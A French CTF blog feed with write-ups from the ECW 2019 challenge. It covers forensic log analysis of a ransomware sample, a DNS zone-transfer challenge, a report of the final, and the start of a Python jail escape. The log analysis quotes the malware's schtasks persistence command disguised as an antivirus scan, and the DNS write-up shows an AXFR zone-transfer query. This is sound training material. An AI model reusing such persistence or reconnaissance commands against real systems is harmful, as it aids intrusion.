class="se">\s</span>cvhost.exe<span class="s2">""","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c81b-5d8d-0000-0010ed433700<span class="o">}</span><span class="s2">","</span><span class="m">8312</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81c-5d8d-0000-0010e1493700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>?<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511750</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:12.226<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:13.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","</span>schtasks.exe /create /f /tn Security<span class="se">\A</span>ntivirusScan /tr C:<span class="se">\U</span>sers<span class="se">\r</span>obert<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\W</span>INDefender.exe /sc DAILY<span class="s2">","</span>Microsoft Corporation<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"Task Scheduler Configuration Tool"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:16"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXBKQMZT9Q2G5XYERS9YBN"</span>,,,<span class="s2">"SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8"</span>,<span class="s2">"C:\Windows\SysWOW64\schtasks.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:13.974\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"schtasks.exe"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"E:\scvhost.exe"</span>,<span class="s2">"{6b71f96b-c81c-5d8d-0000-0010e1493700}"</span>,<span class="s2">"5428"</span>,,<span class="s2">"{6b71f96b-c81d-5d8d-0000-00102b973700}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"512731"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:13.974"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:12.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"TASKLIST /FI ""imagename eq payload.py"""</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Lists the current running tasks<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:13<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXBGQ97R07WE3QQ0S1BPPG<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>514103BF51B9006D80D0D75018A56E3AF6D03428,MD5<span class="o">=</span>2185AD666AA7188AC9DB4E33DC6A2838,SHA256<span class="o">=</span>B4A874C5CCFA9A698E4A56D7453105CC7617802C385ABE1603760A9BB33D39ED,IMPHASH<span class="o">=</span>D16A743355B243B7509AE74891F10F6B<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ysWOW64<span class="se">\t</span>asklist.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:12.777<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>tasklist.exe<span class="s2">","""</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">""","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c81c-5d8d-0000-0010e1493700<span class="o">}</span><span class="s2">","</span><span class="m">5428</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81c-5d8d-0000-0010115e3700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511935</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:12.777<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
</code></pre></div>
<p>Et là, on découvre le pot aux roses : <code>schtasks.exe /create /f /tn Security\AntivirusScan /tr C:\Users\robert\AppData\Roaming\WINDefender.exe /sc DAILY</code>.</p>
<p>Le ransomware a créé une tâche programmée du nom de Security\AntivirusScan et qui va exécuter le fichier WINDefender.exe tous les jours.</p>
<p>En regardant dans les logs, on voit que powershell a créé ce fichier WINDefender.exe deux secondes avant que la tâche programmée ne soit créée par scvhost.exe</p>
<div class="highlight"><pre><span></span><code>$ grep <span class="s1">'WINDefender'</span> logs.csv
<span class="s2">"2019-09-27T08:28:13.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"schtasks.exe /create /f /tn Security\AntivirusScan /tr C:\Users\robert\AppData\Roaming\WINDefender.exe /sc DAILY"</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Task Scheduler Configuration Tool<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:16<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXBKQMZT9Q2G5XYERS9YBN<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>77F125CE5840293890E1359483C7104AADE25FA7,MD5<span class="o">=</span>5BD86A7193D38880F339D4AFB1F9B63A,SHA256<span class="o">=</span>72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH<span class="o">=</span>012D1B3C5FD8B10F0F36DB7243A28CB8<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ysWOW64<span class="se">\s</span>chtasks.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:13.974<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>schtasks.exe<span class="s2">","""</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">""","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c81c-5d8d-0000-0010e1493700<span class="o">}</span><span class="s2">","</span><span class="m">5428</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81d-5d8d-0000-00102b973700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">512731</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:13.974<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:11.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>File created <span class="o">(</span>rule: FileCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">",,,"</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.694<span class="s2">",,,,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">11</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:12<span class="s2">","</span>INFO<span class="s2">",,"</span>01DNRXBFGKC5BVTGRP6PY02FWF<span class="s2">",,,,"</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">",,,"</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">",,,"</span>File created:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.694<span class="se">\\</span>r<span class="se">\\</span>nPro<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">",,,,,,,"</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,,"</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511648</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,"</span>C:<span class="se">\U</span>sers<span class="se">\r</span>obert<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\W</span>INDefender.exe<span class="s2">",,,,,"</span><span class="m">11</span><span class="s2">",,"</span><span class="m">5048</span><span class="s2">",,,"</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.694<span class="s2">","</span><span class="m">2</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:13.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,,,,"</span>Process Creation<span class="s2">","</span>Security<span class="s2">","</span>schtasks.exe /create /f /tn Security<span class="se">\A</span>ntivirusScan /tr C:<span class="se">\U</span>sers<span class="se">\r</span>obert<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\W</span>INDefender.exe /sc DAILY<span class="s2">",,,,,,,"</span><span class="m">4688</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:17<span class="s2">","</span>AUDIT_SUCCESS<span class="s2">",,"</span>01DNRXBMNRBYNTWMFPZM0JZESX<span class="s2">",,,,,,,"</span>-9214364837600034816<span class="s2">","</span><span class="m">6</span><span class="s2">",,,"</span>A new process has been created.<span class="se">\\</span>r<span class="se">\\</span>n<span class="se">\\</span>r<span class="se">\\</span>nCreator Subject:<span class="se">\\</span>r<span class="se">\\</span>n Security I<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">",,,,,,,,"</span><span class="m">4</span><span class="s2">",,,"</span><span class="o">{</span><span class="m">54849625</span>-5478-4994-A5BA-3E3B0328C30D<span class="o">}</span><span class="s2">","</span><span class="m">66827</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Security-Auditing<span class="s2">",,,,,"</span>DESKTOP-F5ERMDT<span class="s2">","</span>0x9254f<span class="s2">","</span>robert<span class="s2">","</span>S-1-5-21-4014005275-3135484918-1388781346-1001<span class="s2">",,,,,,"</span><span class="m">13312</span><span class="s2">",,"</span><span class="m">8884</span><span class="s2">",,,,,"</span><span class="m">2</span><span class="s2">"</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> -n <span class="s2">"WINDefender.exe"</span> <span class="p">|</span> sha1sum <span class="p">|</span> sed -E <span class="s1">'s/^(.)(.*)(.) -/ECW{\1\2\3}/'</span>
ECW<span class="o">{</span>2d8...6f4<span class="o">}</span>
</code></pre></div>
<p>Merci aux organisateurs pour le ctf et à vous pour votre lecture !</p>
<p>Killbit</p>ECW - Where is the DNS?2019-11-22T00:00:00+01:002019-11-22T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-11-22:/ecw-where-is-the-dns.html<div class="highlight"><pre><span></span><code><span class="k">Where</span> <span class="k">is</span> <span class="n">the</span> <span class="n">DNS</span><span class="o">?</span> <span class="p">(</span><span class="mi">25</span> <span class="n">points</span><span class="p">)</span>
<span class="n">The</span> <span class="n">DHCP</span> <span class="n">server</span> <span class="k">of</span> <span class="n">the</span> <span class="n">Harbour</span> <span class="n">Master</span><span class="err">'</span><span class="n">s</span> <span class="n">Office</span> <span class="p">(</span><span class="n">HMO</span><span class="p">)</span> <span class="n">LAN</span> <span class="p">(</span><span class="mi">10</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">10</span><span class="p">.</span><span class="mi">0</span><span class="o">/</span><span class="mi">24</span><span class="p">)</span> <span class="k">in</span> <span class="n">which</span> <span class="n">you</span> <span class="k">are</span> <span class="n">connected</span> <span class="n">push</span> <span class="n">a</span> <span class="n">bad</span> <span class="n">DNS</span> <span class="n">configuration</span> <span class="k">to</span> <span class="n">its</span> <span class="n">clients</span><span class="p">.</span>
<span class="k">If</span> <span class="n">you</span> <span class="n">want</span> <span class="k">to</span> <span class="n">resolve</span> <span class="n">DNS</span> <span class="n">hostnames</span><span class="p">,</span> <span class="n">you</span> <span class="n">will</span> <span class="n">have</span> <span class="k">to</span> <span class="n">find</span> <span class="n">a</span> <span class="n">working</span> <span class="n">DNS …</span></code></pre></div><div class="highlight"><pre><span></span><code><span class="k">Where</span> <span class="k">is</span> <span class="n">the</span> <span class="n">DNS</span><span class="o">?</span> <span class="p">(</span><span class="mi">25</span> <span class="n">points</span><span class="p">)</span>
<span class="n">The</span> <span class="n">DHCP</span> <span class="n">server</span> <span class="k">of</span> <span class="n">the</span> <span class="n">Harbour</span> <span class="n">Master</span><span class="err">'</span><span class="n">s</span> <span class="n">Office</span> <span class="p">(</span><span class="n">HMO</span><span class="p">)</span> <span class="n">LAN</span> <span class="p">(</span><span class="mi">10</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">10</span><span class="p">.</span><span class="mi">0</span><span class="o">/</span><span class="mi">24</span><span class="p">)</span> <span class="k">in</span> <span class="n">which</span> <span class="n">you</span> <span class="k">are</span> <span class="n">connected</span> <span class="n">push</span> <span class="n">a</span> <span class="n">bad</span> <span class="n">DNS</span> <span class="n">configuration</span> <span class="k">to</span> <span class="n">its</span> <span class="n">clients</span><span class="p">.</span>
<span class="k">If</span> <span class="n">you</span> <span class="n">want</span> <span class="k">to</span> <span class="n">resolve</span> <span class="n">DNS</span> <span class="n">hostnames</span><span class="p">,</span> <span class="n">you</span> <span class="n">will</span> <span class="n">have</span> <span class="k">to</span> <span class="n">find</span> <span class="n">a</span> <span class="n">working</span> <span class="n">DNS</span> <span class="n">server</span> <span class="n">somewhere</span> <span class="k">into</span> <span class="n">the</span> <span class="n">network</span> <span class="n">infrastructure</span><span class="p">.</span>
<span class="k">If</span> <span class="n">so</span><span class="p">,</span> <span class="n">make</span> <span class="n">sure</span> <span class="n">this</span> <span class="n">server</span> <span class="n">has</span> <span class="k">no</span> <span class="k">security</span> <span class="n">issue</span> <span class="k">in</span> <span class="n">its</span> <span class="n">configuration</span><span class="p">.</span>
</code></pre></div>
<p>Lors de la première connexion sur le réseau, le bail DHCP ne renvoyé pas de serveur DNS. Sachant que le serveur <code>10.0.10.1</code> est un pfSense, on peut se douter que le service DNS est également activé.
On change donc notre configuration pour l'ajouter. Cela nous permet d'avoir accès à la plate-forme de soumission pour les flags.</p>
<p>Le flag semble être contenu dans le DNS suivant l’énoncé. On peut voir si le transfert de zone est activée sur celui-ci :</p>
<div class="highlight"><pre><span></span><code>$ dig harbour.lan @10.0.10.1 -t AXFR
</code></pre></div>
<p>Hum. Cela ne semble pas concluant. Le pfSense de doit peut-être pas le seul serveur DNS présent. On fait donc un SOA sur la zone :</p>
<div class="highlight"><pre><span></span><code>$ dig @10.0.10.1 SOA harbour.lan
<span class="p">;</span> <<>> DiG <span class="m">9</span>.14.7 <<>> SOA harbour.lan
<span class="p">;;</span> global options: +cmd
<span class="o">[</span>...<span class="o">]</span>
<span class="p">;;</span> QUESTION SECTION:
<span class="p">;</span>harbour.lan. IN SOA
<span class="p">;;</span> ANSWER SECTION:
harbour.lan. <span class="m">604800</span> IN SOA dmz-dns.harbour.lan. admin.harbour.lan. <span class="m">3</span> <span class="m">604800</span> <span class="m">86400</span> <span class="m">2419200</span> <span class="m">604800</span>
<span class="p">;;</span> ADDITIONAL SECTION:
dmz-dns.harbour.lan. <span class="m">604800</span> IN A <span class="m">10</span>.0.100.30
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
<p>C'est bien ça. Le pfSense ne fait pas autorité sur la zone. Ce qui empêche donc le transfert de zone.</p>
<p>On refait notre requête sur ce serveur dns :</p>
<div class="highlight"><pre><span></span><code>$ dig harbour.lan @10.0.100.30 -t AXFR
</code></pre></div>
<p>Et voilà ! Encore 25 points de validés :).</p>ECW - REX2019-11-21T00:00:00+01:002019-11-21T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-11-21:/ecw-rex.html<p>Après avoir été qualifié lors du CTF en ligne (<a href="https://www.challenge-ecw.fr">https://www.challenge-ecw.fr</a>, 61ème avec 225 points), j'ai pu prendre part à la finale se déroulant au Couvant des Jacobins, Rennes (35).</p>
<p><img alt="logo.jpg" src="https://blog.nlegall.fr/images/ecw/logo.jpg"></p>
<p>Les qualifications ont été organisées par Thales et la finale par Airbus. Je tiens à les remercier tout …</p><p>Après avoir été qualifié lors du CTF en ligne (<a href="https://www.challenge-ecw.fr">https://www.challenge-ecw.fr</a>, 61ème avec 225 points), j'ai pu prendre part à la finale se déroulant au Couvant des Jacobins, Rennes (35).</p>
<p><img alt="logo.jpg" src="https://blog.nlegall.fr/images/ecw/logo.jpg"></p>
<p>Les qualifications ont été organisées par Thales et la finale par Airbus. Je tiens à les remercier tout les deux pour cet événement majeur et très instructif sur tout les points (contact, intellectuel, découverte...).</p>
<p>Il y a de plus en plus d'événement majeurs se déroulant en Bretagne et cela fait plaisir.</p>
<p>Les qualifications ont duré 15 jours (du 5 au 20 Octobre) et la finale 7h30 sur site.</p>
<p>Les qualifications, solo, proposaient 15 challenges répartis en 6 catégories. Cela permet de découvrir plusieurs aspects de la sécurité. Tout le monde peut le faire :).</p>
<p>La finale quand a elle, c'est composée d'une infrastructure compromise et nous devions reprendre la main sur l'ensemble. Ce n'était donc pas un CTF "classique" mais cela est tout aussi intéressant et ne couvre pas les mêmes aspects. L'ensemble des participants étaient répartis dans des équipes de 4 pour un total de 12 équipes. Nous avons fini 8ème avec un score de 355 points (26% du total possible). Je remercie d'ailleurs Al3x, Killbit et <a href="https://www.linkedin.com/in/f-demay/">onosh</a> pour m'avoir accompagné durant ces 7h30 d'épreuves. J'espère vous revoir bientôt lors d'un prochain CTF :D.</p>
<p>L'ensemble de nos Writeup sont disponibles sous le tag <a href="https://blog.nlegall.fr/tag/ecw.html">ecw</a> (qualifications et finale).</p>ECW - TheMatrix2019-10-19T00:00:00+02:002019-10-19T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-10-19:/ecw-thematrix.html<p>Le but d'une jail, c'est de s'en échapper et d'accéder au flag avec les seules fonctions, méthodes ou autres que nous avons à notre disposition. Cette jail est faite en Python3 et nous devons retrouver le flag avec les accès qu'elle nous laisse avoir.</p>
<div class="highlight"><pre><span></span><code>ssh -p <span class="m">10022</span> tete2soja@challenge-ecw.fr …</code></pre></div><p>Le but d'une jail, c'est de s'en échapper et d'accéder au flag avec les seules fonctions, méthodes ou autres que nous avons à notre disposition. Cette jail est faite en Python3 et nous devons retrouver le flag avec les accès qu'elle nous laisse avoir.</p>
<div class="highlight"><pre><span></span><code>ssh -p <span class="m">10022</span> tete2soja@challenge-ecw.fr
<span class="o">[</span>...<span class="o">]</span>
ECW Challenge - Interactive challenge gateway
Select a challenge to connect to:
Note: connections are limited to <span class="m">1</span> per user
TheMatrix
,
/<span class="p">|</span> __
/ <span class="p">|</span> ,-~ /
Y :<span class="p">|</span> // /
<span class="p">|</span> jj /<span class="o">(</span> .^
>-<span class="s2">"~"</span>-v<span class="s2">"</span>
<span class="s2"> / Y</span>
<span class="s2"> jo o |</span>
<span class="s2"> ( ~T~ j</span>
<span class="s2"> >._-' _./</span>
<span class="s2"> / "</span>~<span class="s2">" |</span>
<span class="s2"> Y _, |</span>
<span class="s2"> /| ;-"</span>~ _ l
/ l/ ,-<span class="s2">"~ \</span>
<span class="s2">\//\/ .- \</span>
<span class="s2"> Y / Y </span>
<span class="s2"> l I !</span>
<span class="s2"> ]\ _\ /"</span><span class="se">\</span>
<span class="o">(</span><span class="s2">" ~----( ~ Y. )</span>
<span class="s2">~~~~~~~~~~~~~~~~~~~~~~~~~~</span>
<span class="s2">Follow the white rabbit !</span>
</code></pre></div>
<p>Bon, on est connecté et sur le bon challenge. Les hostilités peuvent donc commencer !</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Return a dictionary representing the current global symbol table. This is always the dictionary of the current module (inside a function or method, this is the module where it is defined, not the module from which it is called).</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">globals</span><span class="p">())</span>
<span class="p">{</span><span class="s1">'__name__'</span><span class="p">:</span> <span class="s1">'__main__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="s1">'__package__'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="s1">'__loader__'</span><span class="p">:</span> <span class="o"><</span><span class="n">_frozen_importlib_external</span><span class="o">.</span><span class="n">SourceFileLoader</span> <span class="nb">object</span> <span class="n">at</span> <span class="mh">0x7fddf767c048</span><span class="o">></span><span class="p">,</span> <span class="s1">'__spec__'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="s1">'__annotations__'</span><span class="p">:</span> <span class="p">{},</span> <span class="s1">'__builtins__'</span><span class="p">:</span> <span class="o"><</span><span class="n">module</span> <span class="s1">'builtins'</span> <span class="p">(</span><span class="n">built</span><span class="o">-</span><span class="ow">in</span><span class="p">)</span><span class="o">></span><span class="p">,</span> <span class="s1">'__file__'</span><span class="p">:</span> <span class="s1">'/app/jail.py'</span><span class="p">,</span> <span class="s1">'__cached__'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="s1">'sys'</span><span class="p">:</span> <span class="o"><</span><span class="n">module</span> <span class="s1">'sys'</span> <span class="p">(</span><span class="n">built</span><span class="o">-</span><span class="ow">in</span><span class="p">)</span><span class="o">></span><span class="p">,</span> <span class="s1">'signal'</span><span class="p">:</span> <span class="o"><</span><span class="n">module</span> <span class="s1">'signal'</span> <span class="kn">from</span> <span class="s1">'/usr/lib/python3.7/signal.py'</span><span class="o">></span><span class="p">,</span> <span class="s1">'bye'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">bye</span> <span class="n">at</span> <span class="mh">0x7fddf76b71e0</span><span class="o">></span><span class="p">,</span> <span class="s1">'sigterm_handler'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">sigterm_handler</span> <span class="n">at</span> <span class="mh">0x7fddf75c0d08</span><span class="o">></span><span class="p">,</span> <span class="s1">'banner'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">banner</span> <span class="n">at</span> <span class="mh">0x7fddf75c0d90</span><span class="o">></span><span class="p">,</span> <span class="s1">'filtering_small'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">filtering_small</span> <span class="n">at</span> <span class="mh">0x7fddf75c0e18</span><span class="o">></span><span class="p">,</span> <span class="s1">'filtering'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">filtering</span> <span class="n">at</span> <span class="mh">0x7fddf75c0ea0</span><span class="o">></span><span class="p">,</span> <span class="s1">'jail'</span><span class="p">:</span> <span class="o"><</span><span class="n">function</span> <span class="n">jail</span> <span class="n">at</span> <span class="mh">0x7fddf75c0f28</span><span class="o">></span><span class="p">}</span>
<span class="c1"># Without arguments, return the list of names in the current local scope. With an argument, attempt to return a list of valid attributes for that object.</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">())</span>
<span class="p">[</span><span class="s1">'matrix'</span><span class="p">,</span> <span class="s1">'res'</span><span class="p">]</span>
<span class="c1"># If the object has a method named __dir__(), this method will be called and must return the list of attributes. This allows objects that implement a custom __getattr__() or __getattribute__() function to customize the way dir() reports their attributes.</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="nb">dir</span><span class="p">(</span><span class="n">matrix</span><span class="p">))</span>
<span class="p">[</span><span class="s1">'__bool__'</span><span class="p">,</span> <span class="s1">'__class__'</span><span class="p">,</span> <span class="s1">'__delattr__'</span><span class="p">,</span> <span class="s1">'__dir__'</span><span class="p">,</span> <span class="s1">'__doc__'</span><span class="p">,</span> <span class="s1">'__eq__'</span><span class="p">,</span> <span class="s1">'__format__'</span><span class="p">,</span> <span class="s1">'__ge__'</span><span class="p">,</span> <span class="s1">'__getattribute__'</span><span class="p">,</span> <span class="s1">'__gt__'</span><span class="p">,</span> <span class="s1">'__hash__'</span><span class="p">,</span> <span class="s1">'__init__'</span><span class="p">,</span> <span class="s1">'__init_subclass__'</span><span class="p">,</span> <span class="s1">'__le__'</span><span class="p">,</span> <span class="s1">'__lt__'</span><span class="p">,</span> <span class="s1">'__ne__'</span><span class="p">,</span> <span class="s1">'__new__'</span><span class="p">,</span> <span class="s1">'__reduce__'</span><span class="p">,</span> <span class="s1">'__reduce_ex__'</span><span class="p">,</span> <span class="s1">'__repr__'</span><span class="p">,</span> <span class="s1">'__setattr__'</span><span class="p">,</span> <span class="s1">'__sizeof__'</span><span class="p">,</span> <span class="s1">'__str__'</span><span class="p">,</span> <span class="s1">'__subclasshook__'</span><span class="p">]</span>
